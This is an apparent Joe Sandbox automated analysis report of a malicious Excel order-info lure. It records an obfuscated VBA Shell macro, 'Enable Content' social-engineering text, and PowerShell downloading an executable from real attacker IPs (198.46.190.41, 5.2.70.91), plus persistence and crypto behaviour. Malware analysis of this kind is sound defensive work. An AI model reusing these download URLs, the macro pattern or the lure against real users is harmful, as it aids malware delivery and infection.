Loading ...

Analysis Report Your_Order_Info_901027.xls

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:102806
Start date:11.01.2019
Start time:19:36:19
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 27s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Your_Order_Info_901027.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:21
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.expl.evad.winXLS@29/24@0/4
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 67.6% (good quality ratio 64.2%)
  • Quality average: 84.3%
  • Quality standard deviation: 27.3%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 24
  • Number of non-executed functions: 62
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, powershell.exe, powershell.exe

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

All HTTP servers contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid Accounts1Command-Line Interface1Valid Accounts1Valid Accounts1Valid Accounts1Credential DumpingProcess Discovery2Application Deployment SoftwareData from Local SystemData Encrypted2Standard Cryptographic Protocol2
Replication Through Removable MediaPowerShell5Modify Existing Service1Process Injection1Disabling Security Tools111Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Non-Application Layer Protocol2
Drive-by CompromiseScripting521Accessibility FeaturesPath InterceptionProcess Injection1Input CaptureSecurity Software Discovery121Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol12
Exploit Public-Facing ApplicationExploitation for Client Execution12System FirmwareDLL Search Order HijackingDeobfuscate/Decode Files or Information1Credentials in FilesSystem Network Configuration Discovery1Logon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessScripting521Account ManipulationFile and Directory Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information2Brute ForceSystem Information Discovery24Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://198.46.190.41/largo.vinAvira URL Cloud: Label: malware
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exevirustotal: Detection: 10%Perma Link
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exevirustotal: Detection: 10%Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B2896 CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,18_2_004B2896
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004C051F CryptBinaryToStringW,CryptBinaryToStringW,CryptBinaryToStringW,18_2_004C051F
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B55B0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,18_2_004B55B0
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B863D CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,18_2_004B863D
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E155B0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,20_2_00E155B0
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E1863D CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,20_2_00E1863D
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E12896 CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,20_2_00E12896
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E2051F CryptBinaryToStringW,CryptBinaryToStringW,CryptBinaryToStringW,20_2_00E2051F

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick LaunchJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004C31F8 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,18_2_004C31F8
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004C22DE FindFirstFileW,FindNextFileW,FindClose,18_2_004C22DE
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004C1368 SHGetFolderPathW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,Sleep,FindNextFileW,FindClose,18_2_004C1368
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E231F8 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,20_2_00E231F8
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E222DE FindFirstFileW,FindNextFileW,FindClose,20_2_00E222DE
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E21368 SHGetFolderPathW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,Sleep,FindNextFileW,FindClose,20_2_00E21368

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49221 -> 5.2.70.91:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49220 -> 198.46.190.41:80

Networking:

barindex
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.190.41
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jan 2019 18:37:12 GMTServer: Apache/2.4.10 (Debian)Last-Modified: Fri, 11 Jan 2019 18:37:12 GMTETag: W/"66e3e-57f332c3fed80"Accept-Ranges: bytesContent-Length: 421438Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 dd c4 38 5c 00 36 06 00 7a 02 00 00 e0 00 07 03 0b 01 02 17 00 a4 03 00 00 32 06 00 00 02 00 00 a0 12 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 a0 06 00 00 04 00 00 8c d6 06 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 94 03 00 00 00 00 00 00 00
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /knot1.php HTTP/1.1Host: 198.46.190.41Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /largo.vin HTTP/1.1Host: 198.46.190.41
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 107.172.129.21 107.172.129.21
Source: Joe Sandbox ViewIP Address: 198.46.190.41 198.46.190.41
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: AS-COLOCROSSING-ColoCrossingUS AS-COLOCROSSING-ColoCrossingUS
Source: Joe Sandbox ViewASN Name: AS-COLOCROSSING-ColoCrossingUS AS-COLOCROSSING-ColoCrossingUS
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49220 -> 198.46.190.41:80
Source: global trafficTCP traffic: 192.168.2.2:49221 -> 5.2.70.91:443
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /knot1.php HTTP/1.1Host: 198.46.190.41Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /largo.vin HTTP/1.1Host: 198.46.190.41
Urls found in memory or binary dataShow sources
Source: powershell.exe, 00000007.00000002.2073956655.02111000.00000004.sdmpString found in binary or memory: http://198.46.190.41
Source: powershell.exe, 00000007.00000002.2058181656.000CF000.00000004.sdmpString found in binary or memory: http://198.46.190.41/knot1.php
Source: powershell.exe, 00000007.00000002.2073956655.02111000.00000004.sdmpString found in binary or memory: http://198.46.190.41/largo.vin
Source: powershell.exe, 00000007.00000002.2073956655.02111000.00000004.sdmpString found in binary or memory: http://198.46.190.41x&
Source: tmp0261.exe, 00000014.00000002.2307260018.00284000.00000004.sdmp, tmp0261.exe, 00000014.00000002.2307286354.002AA000.00000004.sdmpString found in binary or memory: https://5.2.70.91/sat32/899552_W617601.96C4976B204181C08FFC37CA51BCE902/5/spk/
Source: tmp0261.exe, 00000014.00000002.2307260018.00284000.00000004.sdmpString found in binary or memory: https://5.2.70.91/sat32/899552_W617601.96C4976B204181C08FFC37CA51BCE902/5/spk/B
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 443

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B55B0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,18_2_004B55B0
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E155B0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,20_2_00E155B0

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 3Screenshot OCR: Enable Editing" form the yellow bar and then click 10 "Enable Content" 11 12 13 14 15 16 17
Source: Screenshot number: 3Screenshot OCR: Enable Content" 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
Source: Screenshot number: 4Screenshot OCR: Enable Editing" form the yellow bar and then click 10 "Enable Content" 11 12 13 14 15 16 17
Source: Screenshot number: 4Screenshot OCR: Enable Content" 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
Source: Document image extraction number: 0Screenshot OCR: Enable Editing" form the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0Screenshot OCR: Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Editing" form the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Content"
Source: Screenshot number: 5Screenshot OCR: Enable Editing" form the yellow bar and then click 10 "Enable Content" 11 12 13 14 15 16 17
Source: Screenshot number: 5Screenshot OCR: Enable Content" 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
Source: Screenshot number: 6Screenshot OCR: Enable Editing" form the yellow bar and then click 10 "Enable Content" 11 12 13 14 15 16 17
Source: Screenshot number: 6Screenshot OCR: Enable Content" 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
Source: Screenshot number: 7Screenshot OCR: Enable Editing" form the yellow bar and then click 10 "Enable Content" 11 12 13 14 15 16 17
Source: Screenshot number: 7Screenshot OCR: Enable Content" 11 12 13 14 15 16 17 18 19 20 21 .I kj 22 23 24 25 26 27 28 29
Document contains an embedded VBA macro which may execute processesShow sources
Source: Your_Order_Info_901027.xlsOLE, VBA macro line: ''Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Source: Your_Order_Info_901027.xlsOLE, VBA macro line: Call Shell(GetDecStr2(Cells(2, 1).Text) & GetDecStr2(Cells(3, 1).Text) & GetDecStr2(Cells(4, 1).Text) & GetDecStr2(Cells(5, 1).Text) & GetDecStr2(Cells(6, 1).Text) & GetDecStr2(Cells(7, 1).Text) & GetDecStr2(Cells(8, 1).Text) & GetDecStr2(Cells(9, 1).Text) & GetDecStr2(Cells(10, 1).Text) & GetDecStr2(Cells(11, 1).Text), Style)
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: Your_Order_Info_901027.xlsOLE, VBA macro line: ''Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Source: Your_Order_Info_901027.xlsOLE, VBA macro line: ''Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Source: Your_Order_Info_901027.xlsOLE, VBA macro line: '' Set ws = CreateObject("WScript.Shell")
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)Show sources
Source: Your_Order_Info_901027.xlsStream path '_VBA_PROJECT_CUR/VBA/mod1' : found possibly 'WScript.Shell' functions currentdirectory, environment, exec, environ
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 198.46.190.41 80Jump to behavior
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmp0251.exeJump to dropped file
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B63E7 NtQueryInformationProcess,18_2_004B63E7
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_003C24D0 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,18_2_003C24D0
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E163E7 NtQueryInformationProcess,20_2_00E163E7
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_004F24D0 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,20_2_004F24D0
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004BDDC5 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_004BDDC5
Creates mutexesShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeMutant created: \Sessions\1\BaseNamedObjects\Global\789C000000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeMutant created: \BaseNamedObjects\Global\789C000000000
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B97C518_2_004B97C5
